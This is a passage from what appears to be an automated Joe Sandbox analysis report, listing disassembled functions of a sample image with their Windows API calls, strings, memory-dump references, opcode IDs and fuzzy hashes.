                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: OpenSemaphore$CloseErrorHandleLast
                                                                                      • String ID: _p0$wil
                                                                                      • API String ID: 455305043-1814513734
                                                                                      • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                      • Instruction ID: ca2092d23f411db7f00ceda099a0eee0e304d35c1238a5bd9e494658e07025bd
                                                                                      • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                                                                                      • Instruction Fuzzy Hash: 0261D661B18A8295EFB5EB3594A01B9A3A9FF8CBC8FD44432D90E27744DF3CD5048321
                                                                                      Function 00007FF793741DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapiswspacememset$AllocProcess
                                                                                      • String ID: %s
                                                                                      • API String ID: 2401724867-3043279178
                                                                                      • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                      • Instruction ID: 98c709b810a6c4729e9886b217cca4b3009fdad410a9e8d7512da0e1b7c52965
                                                                                      • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                                                                                      • Instruction Fuzzy Hash: 8351EF72A0868285EBB0AF31D8902B9B3A9FB4DB95F844135CA4D57795EF3CE441C721
                                                                                      Function 00007FF79374E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswdigit
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 3849470556-1994581435
                                                                                      • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                      • Instruction ID: 5c5267bba9f83ad60654f97cc5d9ac84735fe0d7a42e5773e79ef9eb5e452012
                                                                                      • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                                                                      • Instruction Fuzzy Hash: 2B516A31A08A4285F7B5AF36A4C8279B7A9BF4CB64F808535DA4D63790EF7CE440C720
                                                                                      Function 00007FF79376992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF793769A10
                                                                                      • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793769994
                                                                                        • Part of subcall function 00007FF79376A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A77A
                                                                                        • Part of subcall function 00007FF79376A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A839
                                                                                        • Part of subcall function 00007FF79376A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A850
                                                                                      • wcsrchr.MSVCRT ref: 00007FF793769A62
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CloseEnumOpenwcsrchr
                                                                                      • String ID: %s=%s$.
                                                                                      • API String ID: 3242694432-4275322459
                                                                                      • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                      • Instruction ID: 014633fcac2ea2655fa6e53e3f593706f13187bcedb70dac048abe2fbd705a9c
                                                                                      • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                                                                                      • Instruction Fuzzy Hash: 2241B321A08B4286FAB0BB3194E42B9D2DAEF8E7A4F844134DD5E277D5DE3CE445C221
                                                                                      Function 00007FF7937654B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7937654E6
                                                                                      • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF79376552E
                                                                                        • Part of subcall function 00007FF79376758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675AE
                                                                                        • Part of subcall function 00007FF79376758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793766999,?,?,?,?,?,00007FF793758C39), ref: 00007FF7937675C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                      • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                      • API String ID: 779401067-630742106
                                                                                      • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction ID: ecab872ab862bb5ac31dfab98c95c7e22a3d1aa193bea514396cd5fb561f79e6
                                                                                      • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                                                                                      • Instruction Fuzzy Hash: C051C972618A8281EBB1AB31E4A47FAE365EF8C798FC44031DA0E67B55DE3CD405C721
                                                                                      Function 00007FF79375417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectorytowupper
                                                                                      • String ID: :$:
                                                                                      • API String ID: 238703822-3780739392
                                                                                      • Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                      • Instruction ID: 367ce256a251208dff516fd2374a2f5ae28cdb0ad3d1dc3da47928e90818bc21
                                                                                      • Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
                                                                                      • Instruction Fuzzy Hash: B811345260824182FB78AB72E88427AF6E4EF4D79AF858132DD0E17790DF3CD1418724
                                                                                      Function 00007FF7937458D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                      • API String ID: 3677997916-3870813718
                                                                                      • Opcode ID: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction ID: edd0383eac29cc3befd8efa02ad1d4ed1bcb7bc0f2acef5670c0b9f9b8948afc
                                                                                      • Opcode Fuzzy Hash: e374f3dcbd9129e05b114749def04da8ffc7e52e41f89dc762ae3dbe31e9aca9
                                                                                      • Instruction Fuzzy Hash: C1115E72618B41C7EB609B20E48426AF7A8FB89765F804231DB8D137A8DF7CD148CF10
                                                                                      Function 00007FF793744C18 Relevance: 7.7, APIs: 5, Instructions: 164COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memsetwcsrchr$wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 110935159-0
                                                                                      • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction ID: ac86cb9b02b6d142be99b65d12e27b5bbc8461f1910960b4bcf6114e8ee6b853
                                                                                      • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                                                                      • Instruction Fuzzy Hash: 3551D722B0978285FEB1AB2198983F9D399BF4DBA4F894531CE5D2B7C4DE3CE5419310
                                                                                      Function 00007FF793755EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                      • String ID:
                                                                                      • API String ID: 1403193329-0
                                                                                      • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                      • Instruction ID: 7a9f20e2e8c2df6b65e01261b37a0cf5d85a927bff3f94da83000cad7084cb86
                                                                                      • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                                                                      • Instruction Fuzzy Hash: C451C327A0568585EBB9AF30D9806B9B7A4FF4C759F848536CA0E173D4EF3CD5448320
                                                                                      Function 00007FF7937491C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00007FF79374921C
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7937493AA
                                                                                        • Part of subcall function 00007FF793748B20: wcsrchr.MSVCRT ref: 00007FF793748BAB
                                                                                        • Part of subcall function 00007FF793748B20: _wcsicmp.MSVCRT ref: 00007FF793748BD4
                                                                                        • Part of subcall function 00007FF793748B20: _wcsicmp.MSVCRT ref: 00007FF793748BF2
                                                                                        • Part of subcall function 00007FF793748B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793748C16
                                                                                        • Part of subcall function 00007FF793748B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF793748C2F
                                                                                        • Part of subcall function 00007FF793748B20: wcschr.MSVCRT ref: 00007FF793748CB3
                                                                                        • Part of subcall function 00007FF79375417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7937541AD
                                                                                        • Part of subcall function 00007FF793753060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7937492AC), ref: 00007FF7937530CA
                                                                                        • Part of subcall function 00007FF793753060: SetErrorMode.KERNELBASE ref: 00007FF7937530DD
                                                                                        • Part of subcall function 00007FF793753060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7937530F6
                                                                                        • Part of subcall function 00007FF793753060: SetErrorMode.KERNELBASE ref: 00007FF793753106
                                                                                      • wcsrchr.MSVCRT ref: 00007FF7937492D8
                                                                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793749362
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF793749373
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3966000956-0
                                                                                      • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                      • Instruction ID: fa46a9141fe08f69b729e8617a1a8457e889bec2c89fbb5d4f1be551690404af
                                                                                      • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                                                                      • Instruction Fuzzy Hash: 4D51C532A0968285FBB1AF31D8D42B9A3A9FB4E754F844031CA4D17794DF3CE551C710
                                                                                      Function 00007FF793742A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_setjmp
                                                                                      • String ID:
                                                                                      • API String ID: 3883041866-0
                                                                                      • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                      • Instruction ID: b4c7dcf35209bcce9ff5378bcb4d8d44bb42fe339d36904fd9e01085c0c03ec1
                                                                                      • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                                                                      • Instruction Fuzzy Hash: 8D515F72708B868AEBB19F30D8843E9B7A9FB49748F804135DA4D57A48DF3CE645CB10
                                                                                      Function 00007FF79374B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B4BD
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506D6
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF7937506F0
                                                                                        • Part of subcall function 00007FF7937506C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF79375074D
                                                                                        • Part of subcall function 00007FF7937506C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF79374B4DB), ref: 00007FF793750762
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B518
                                                                                      • _wcsicmp.MSVCRT ref: 00007FF79374B58B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$_wcsicmp$AllocProcess
                                                                                      • String ID: ELSE$IF/?
                                                                                      • API String ID: 3223794493-1134991328
                                                                                      • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction ID: 44a51ca4b7972b9b0a796843889b356c3f4887dbcdcd015dbb18842c6d4bac6e
                                                                                      • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                                                                      • Instruction Fuzzy Hash: C8414A21A0964381FBF4BB35A4D92BAE6AEAF4C744FC44039D54E663A5DE3CF8008761
                                                                                      Function 00007FF79376E3E8 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                                                                      • String ID:
                                                                                      • API String ID: 1532185241-0
                                                                                      • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction ID: f39d3dc08ebb12bc9e39a97f9a341872957bdac2845b85c9a440d7c9298e6d70
                                                                                      • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                                                                      • Instruction Fuzzy Hash: 4F41F632A04B5187F7A4AB31E49557DFAA5FB8CB80F844535EA0A53B81CF3CE941CB21
                                                                                      Function 00007FF793744FE8 Relevance: 7.6, APIs: 5, Instructions: 102fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3588551418-0
                                                                                      • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                      • Instruction ID: da2f3fb315c532be1588ef3813a7a38b8854d2a9c4a8b30fd263becd5125f8fc
                                                                                      • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                                                                      • Instruction Fuzzy Hash: 1241A431A086428BF7B46B31A4D427DF669EF4DB91F944039DA4E67791CE3CE8408760
                                                                                      Function 00007FF79376E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
